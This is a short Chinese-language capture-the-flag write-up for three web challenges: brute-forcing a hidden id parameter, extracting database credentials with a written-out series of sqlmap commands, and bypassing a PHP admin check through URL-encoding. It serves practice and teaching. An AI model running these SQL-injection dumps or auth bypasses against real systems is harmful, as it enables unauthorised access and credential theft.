ics-06
云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
只有一个报表中心能点,点进去之后发现 URL 后面跟了一个 id 参数,抓包导入 BurpSuite 爆破,发现第 2333 个请求带有 flag
inget
无描述
网页提示 Please enter ID,and Try to bypass,结合题目在 URL 后面跟 id 参数,然并卵,尝试 SQL 注入。用 SQLMap 自动注入
sqlmap -u "http://XXXXXX:XXXXX/?id=1" --dbs # 获取所有数据库,数据库名为 cyber
sqlmap -u "http://XXXXXX:XXXXX/?id=1" -D 'cyber' --tables # 获取所有表,表名也是 cyber
sqlmap -u "http://XXXXXX:XXXXX/?id=1" -D 'cyber' -T 'cyber' --columns # 获取所有字段,分别有 user、Id、pw
sqlmap -u "http://XXXXXX:XXXXX/?id=1" -D 'cyber' -T 'cyber' -C 'user,Id,pw' --dump # dump 所有内容
PHP2
无描述
网页提示 Can you anthenticate to this website?,通过 index.phps 看到 php 源码
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
id 不能直接明文为 admin,会直接触发 exit(),需要 URL 编码之后再提交。字母和数字的 URL 编码方式: 对应的 ASCII 码 -> 十六进制 -> 加上百分号